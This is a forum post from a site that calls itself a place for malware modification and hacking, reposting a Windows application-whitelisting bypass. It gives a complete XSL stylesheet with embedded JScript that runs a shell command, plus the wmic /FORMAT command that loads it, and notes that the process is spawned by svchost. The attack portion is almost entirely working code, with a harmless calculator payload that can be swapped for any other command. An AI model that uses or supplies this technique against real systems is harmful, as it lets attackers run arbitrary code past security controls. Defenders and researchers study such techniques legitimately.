Application Whitelisting Bypass with WMIC and XSL

Polaris

Polaris

Member
Staff member
Joined
Jan 2, 2023
Messages
28
Reaction score
3
Points
8
Another application whitelist bypassing technique discovered by Casey @subTee, similar to squiblydoo

Execution
Define the XSL file containing the jscript payload:
Code: 
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc");
    ]]> </ms:script>
</stylesheet>

Invoke any wmic command now and specify /format pointing to the evil.xsl:

Code: 
wmic os get /FORMAT:"evil.xsl"

Screenshot from 2019-04-10 22-05-24.png

Observation

Calculator is spawned by svchost.exe:

Screenshot from 2019-04-10 21-57-52.png
 
You must log in or register to reply here.

About us

  • Illegalim Forums is a forum created to share knowledge about malware modification, hacking, security, programming, cracking, among many other things. Also of tools related to the above. If you have interest and desire to learn do not hesitate to register and start being part of our community, if you are new we will help you in everything we can.

Quick Navigation

Home Forums Contact us

User Menu

Login
Community platform by XenForo® © 2010-2022 XenForo Ltd. | Style by ThemeHouse
Top Bottom